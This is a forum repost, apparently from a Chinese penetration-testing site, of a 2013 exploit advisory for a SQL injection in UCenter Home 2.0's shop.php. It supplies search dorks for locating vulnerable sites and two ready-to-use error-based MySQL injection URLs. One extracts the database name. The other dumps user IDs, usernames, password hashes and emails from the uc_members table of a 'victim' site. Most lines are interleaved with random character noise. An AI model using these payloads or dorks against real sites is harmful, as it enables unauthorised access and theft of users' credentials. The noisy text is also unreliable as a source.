中国网络渗透测试联盟

标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability [打印本页]

作者: admin    时间: 2013-2-27 21:31
标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability
% ~2 n; L2 l5 Z
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  & _' T3 r) w* I
$ b) x( e' p6 ]$ R' D
                                 ) R  S. Q% x# d, d
6 t: {% q6 r8 K/ d9 P
*/ Author : KnocKout  ( ~$ q& f, G6 p: k0 Y! r$ u" Z

& S6 k: ^5 n, ?7 k8 N*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  
% N1 o) |) m& O! p) p4 N# c% J% L$ F" {. A  T8 X8 U
*/ Contact: knockoutr@msn.com  
1 @0 M% z% z& D8 @1 {5 Q% b; Y$ [+ T$ S6 @0 R! U4 P
*/ Cyber-Warrior.org/CWKnocKout  * P% H) ]$ z7 a3 H3 Y; V- E
0 i  U' \. H% D. |' X9 {( ?! v
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  0 F! R  b/ W: U/ a
/ g" C0 T% C/ x8 R1 M
Script : UCenter Home  
' H+ Y, n/ E( J' z3 z8 i( U- T
. Q. X3 C2 k/ U. {  ^& ^Version : 2.0  8 T& Z5 U3 D. o

2 V1 U4 _( r  O9 m" R( mScript HomePage : http://u.discuz.net/  
( q2 U) ?& K! @. T" l& M/ m9 q3 _! D: W% X8 ~5 u2 s. K
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  ' M; P  ]2 V9 `" u% j2 [; q2 v

3 v% |& P# Y9 [3 rDork : Powered by UCenter inurl:shop.php?ac=view  ( a$ n& C" N2 `6 r3 _7 @

0 `: r8 B- Y5 l$ A5 LDork 2 : inurl:shop.php?ac=view&shopid=  
! \3 s9 \8 B# O& ]9 ]4 [2 v
4 `9 k& R9 D$ O% W__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
; p2 I: i, I  f; `: ]  g/ L4 I
" K$ N* }& Y8 OVuln file : Shop.php  
( F' i5 T  F( S# g9 H( j
; n8 ^6 G+ |6 o& o, }3 V1 }( L. mvalue's : (?)ac=view&shopid=  ( Y8 y- w0 Y& k  y1 I5 W- C4 B
" K1 j2 g7 Y& |3 N
Vulnerable Style : SQL Injection (MySQL Error Based)  
4 U; I' ]% D( z( A8 ~7 j1 ~6 L( i6 q( x7 G" P8 H  f
Need Metarials : Hex Conversion  
5 }- O; X  b& z  @& d! r9 y8 G2 V  g2 y/ v) L; Y( @1 a; S9 {
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
& L1 X) D# e( T3 h; S
4 q. c8 D- u2 Q7 `0 Q2 @# f* x1 {5 nYour Need victim Database name.   
5 J) y6 L. p7 H% j; _0 l. U% v
8 J! B, a1 z8 M) p7 j/ `$ Dfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
0 K  q3 w0 O) y: u  ^' L6 p" A6 `8 q- _1 y  E
..  9 O1 Q- c$ K* N, f  }
& Q( e. x; P9 o* m( t
DB : Okey.  1 d7 S- }& a% X2 z" ]
  ?4 o8 L# m2 L9 t( X# |- I
your edit DB `[TARGET DB NAME]`  
. Y1 j# F+ V; U% c4 P( Y6 g3 F" n0 G% m6 ~% h+ B
Example : 'hiwir1_ucenter'  6 l  [. x$ b1 ]" i

4 j. Q% W6 ^$ cEdit : Okey.  
* i4 p% M( I7 p2 r" j) G$ a/ E5 ?5 J. v; z4 _( n
Your use Hex conversion. And edit Your SQL Injection Exploit..  & ]9 P7 {% L% Y, T5 k2 [
: u/ A7 P  L0 a' n
   " F' |  z* [' U! K$ t

/ Y; ?& H; ^0 |Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  - ?3 S: q! ~6 V/ P$ m: P





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2